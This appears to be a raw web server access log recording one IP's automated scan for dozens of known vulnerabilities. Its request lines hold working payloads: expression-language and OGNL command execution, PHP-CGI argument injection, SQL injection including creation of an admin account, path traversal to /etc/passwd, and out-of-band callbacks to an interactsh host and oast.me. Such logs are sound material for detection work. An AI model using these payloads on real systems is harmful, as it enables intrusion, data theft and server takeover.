195.164.49.69 - - [18/Nov/2024:21:50:00 +0000] GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAge3tpbnRlcmFjdHNoLXVybH19%22))) HTTP/1.1 404 1313
195.164.49.69 - - [18/Nov/2024:21:50:02 +0000] POST /cmd,/simZysh/register_main/setCookie HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:21:50:04 +0000] POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:50:06 +0000] GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1 404 1161
195.164.49.69 - - [18/Nov/2024:21:50:08 +0000] GET /_api/web/siteusers HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:50:10 +0000] POST /webtools/control/main/ProgramExport HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:21:50:12 +0000] POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:50:14 +0000] POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:21:50:16 +0000] PATCH /mgmt/tm/auth/user/Ov9Q6 HTTP/1.1 501 1095
195.164.49.69 - - [18/Nov/2024:21:50:20 +0000] GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:21:50:22 +0000] POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1 404 1142
195.164.49.69 - - [18/Nov/2024:21:50:23 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:50:25 +0000] GET /cgi-mod/index.cgi HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:50:27 +0000] GET /wdtEY/CVE-2023-47246.txt?true HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:50:28 +0000] POST /axis2/axis2-admin/login HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:50:29 +0000] POST /axis2-admin/login HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:50:32 +0000] GET /cgi-bin/test.cgi HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:50:32 +0000] GET /cgi-bin/status/status.cgi HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:50:32 +0000] GET /test.cgi HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:21:50:32 +0000] GET /debug.cgi HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:50:33 +0000] GET /cgi-bin/test-cgi HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:50:38 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:50:38 +0000] GET /cgi-bin/status HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:50:38 +0000] GET /cgi-bin/stats HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:50:38 +0000] GET /cgi-bin/test HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:50:49 +0000] POST /cobbler_api HTTP/1.1 404 1085
83.212.98.101 - - [18/Nov/2024:21:50:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
- - - [18/Nov/2024:21:50:51 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:50:53 +0000] POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:21:50:55 +0000] POST /getcfg.php HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:21:50:58 +0000] POST /servlet/UploadServlet HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:50:59 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:51:01 +0000] POST /adxmlrpc.php HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:51:05 +0000] GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:51:07 +0000] GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:21:51:09 +0000] GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:51:11 +0000] POST /users/user-dark-features HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:51:13 +0000] POST /pages/doenterpagevariables.action HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:21:51:13 +0000] POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:21:51:14 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:21:51:14 +0000] POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:21:51:14 +0000] POST /confluence/pages/createpage-entervariables.action HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:21:51:14 +0000] POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:21:51:14 +0000] POST /wiki/pages/createpage-entervariables.action HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:21:51:16 +0000] POST /pages/createpage.action?spaceKey=myproj HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:51:16 +0000] POST /pages/templates2/viewpagetemplate.action HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:21:51:16 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:21:51:17 +0000] POST /template/custom/content-editor HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:21:51:17 +0000] POST /templates/editor-preload-container HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:21:51:37 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:51:39 +0000] POST /classes/Login.php?f=login HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:51:41 +0000] GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:51:43 +0000] POST /guestaccess.aspx HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:51:45 +0000] POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:51:47 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:21:51:49 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:51:51 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:51:52 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:52:01 +0000] POST /api.php HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:52:03 +0000] POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:52:05 +0000] POST /classes/Master.php?f=delete_item HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:52:07 +0000] GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:52:08 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:52:10 +0000] GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:21:52:13 +0000] GET /test.txt HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:21:52:14 +0000] POST /_async/AsyncResponseService HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:52:16 +0000] GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1 404 1141
195.164.49.69 - - [18/Nov/2024:21:52:18 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:52:20 +0000] GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:21:52:25 +0000] GET /sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:52:26 +0000] GET /sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:52:27 +0000] GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:21:52:28 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:52:30 +0000] GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1 404 1150
- - - [18/Nov/2024:21:52:32 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:52:34 +0000] POST /wp-login.php HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:52:36 +0000] GET /cslu/v1/scheduler/jobs HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:21:52:38 +0000] GET /file=web_assets/../config.json HTTP/1.1 404 1112
83.212.98.101 - - [18/Nov/2024:21:52:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:21:52:42 +0000] POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:21:52:44 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:52:46 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:52:48 +0000] GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:52:50 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
- - - [18/Nov/2024:21:52:52 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:52:54 +0000] GET /zm/index.php?sort=if(now()=sysdate()%2Csleep(6)%2C0)&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:52:56 +0000] GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1 404 1153
195.164.49.69 - - [18/Nov/2024:21:52:58 +0000] GET /asispanel/ HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:21:53:00 +0000] GET /admin/login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:21:53:03 +0000] GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:21:53:05 +0000] GET /workflow/ HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:53:07 +0000] GET /_async/favicon.ico HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:53:12 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:53:13 +0000] GET /N0t4xist*~1*/a.aspx HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:21:53:16 +0000] GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:21:53:17 +0000] POST /auth/createAdmin HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:53:29 +0000] GET /jexws/jexws.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:53:30 +0000] GET /jbossass/jbossass.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:53:30 +0000] GET /jexws4/jexws4.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:53:30 +0000] GET /jexinv4/jexinv4.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:21:53:30 +0000] GET /jexws/jexws.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:53:30 +0000] GET /jexws4/jexws4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:53:41 +0000] GET /jexinv4/jexinv4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:21:53:41 +0000] GET /jbossass/jbossass.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:53:43 +0000] GET /wp-admin/ HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:53:45 +0000] POST /ocpu/library/base/R/do.call/json HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:21:53:48 +0000] POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:21:53:50 +0000] PATCH /mgmt/tm/auth/user/Ov9Q6 HTTP/1.1 501 1095
195.164.49.69 - - [18/Nov/2024:21:53:53 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:53:55 +0000] POST /v2/query HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:53:59 +0000] POST /webmail/basic/ HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:54:01 +0000] POST /service_transport/service.action HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:21:54:03 +0000] POST /adminPage/remote/cmdOver HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:21:54:07 +0000] POST /modules/blocktestimonial/addtestimonial.php HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:21:54:11 +0000] GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:21:54:15 +0000] POST /page/exportImport/uploadOperation.jsp HTTP/1.1 404 1119
195.164.49.69 - - [18/Nov/2024:21:54:17 +0000] POST /wp-admin/admin-ajax.php?image_id=123 HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:54:19 +0000] GET /*~1*/a.aspx HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:21:54:21 +0000] GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1 404 1577
- - - [18/Nov/2024:21:54:23 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:54:25 +0000] GET /ucmdb-api/connect HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:54:27 +0000] GET /OS/startup/restore/restoreAdmin.php HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:21:54:29 +0000] GET /js/elfinder.min.js HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:54:31 +0000] GET /secure/ContactAdministrators!default.jspa HTTP/1.1 404 1119
195.164.49.69 - - [18/Nov/2024:21:54:36 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:21:54:38 +0000] GET /hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:21:54:40 +0000] GET /grid/console HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:54:42 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:54:43 +0000] GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:21:54:45 +0000] GET /oam/server/opensso/sessionservice HTTP/1.1 404 1119
195.164.49.69 - - [18/Nov/2024:21:54:47 +0000] GET /cacti/cmd_realtime.php?1+1&&id=1+1+1 HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:54:49 +0000] GET /GLuZ5.txt HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:54:51 +0000] GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:54:53 +0000] POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:54:55 +0000] GET /upload/cbaaabb.html HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:21:54:57 +0000] GET /pods HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:21:55:00 +0000] GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:55:03 +0000] GET /page/exportImport/fileTransfer/2p2ZZuDDfLdFxdL0aqrHmQajvoB.jsp HTTP/1.1 404 1148
195.164.49.69 - - [18/Nov/2024:21:55:05 +0000] GET /password.jsn HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:55:07 +0000] OPTIONS /N0t4xist*~1*/a.aspx HTTP/1.1 200 -
195.164.49.69 - - [18/Nov/2024:21:55:09 +0000] GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:55:11 +0000] GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:21:55:13 +0000] GET /xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1 404 1123
195.164.49.69 - - [18/Nov/2024:21:55:15 +0000] GET /wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ== HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:55:17 +0000] GET /js/elFinder.version.js HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:55:19 +0000] GET /api/snapshots/:key HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:55:21 +0000] GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1 404 1144
195.164.49.69 - - [18/Nov/2024:21:55:23 +0000] GET /+CSCOE+/session_password.html HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:55:25 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:55:27 +0000] GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:21:55:29 +0000] GET /console HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:55:31 +0000] GET /i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:21:55:33 +0000] GET /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'' HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:55:35 +0000] GET /api/v1/serverinfo HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:55:39 +0000] GET /api/index.php/v1/config/application?public=true HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:21:55:41 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:55:46 +0000] GET /wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1148
195.164.49.69 - - [18/Nov/2024:21:55:47 +0000] GET /api/v1/pods HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:55:48 +0000] GET /workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%272p2zzsw9tbfdhqnkbgyaj7bq6wy%27%2C+NULL%2C+%27F77B2797BB79CF71A2BD2F21A8E4019B%27%2C+%272p2zzsw9tbfdhqnkbgyaj7bq6wyFirstName%27%2C+%272p2zzsw9tbfdhqnkbgyaj7bq6wyLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%272p2zzsw9tbfdhqnkbgyaj7bq6wy%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+- HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:21:55:49 +0000] GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1 404 1103
83.212.98.101 - - [18/Nov/2024:21:55:51 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:21:55:52 +0000] GET /rest/users/1/settings/ HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:21:55:54 +0000] GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:21:55:56 +0000] OPTIONS /*~1*/a.aspx HTTP/1.1 200 -
195.164.49.69 - - [18/Nov/2024:21:55:58 +0000] GET /mifs/aad/api/v2/admins/users HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:21:56:00 +0000] GET /%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:21:56:02 +0000] GET /bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:21:56:04 +0000] GET /openam/oauth2/..;/ccversion/Version HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:21:56:06 +0000] GET /?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5(999999999),1,user()))))--+- HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:56:08 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:56:10 +0000] GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:21:56:12 +0000] GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1 404 1142
195.164.49.69 - - [18/Nov/2024:21:56:14 +0000] GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:56:16 +0000] GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:21:56:20 +0000] GET /wd/hub HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:21:56:20 +0000] POST /index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d%e2%80%99%e2%80%99%26type%3d HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:56:22 +0000] GET /resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf HTTP/1.1 404 1145
195.164.49.69 - - [18/Nov/2024:21:56:24 +0000] GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:56:26 +0000] GET /wp1/home-18/?qtproxycall=https://oast.me HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:56:28 +0000] GET /api/v1/config/application?public=true HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:21:56:30 +0000] GET /InsightPluginShowGeneralConfiguration.jspa; HTTP/1.1 404 1117
195.164.49.69 - - [18/Nov/2024:21:56:34 +0000] GET /wp-admin/install.php?step=1 HTTP/1.1 404 1098
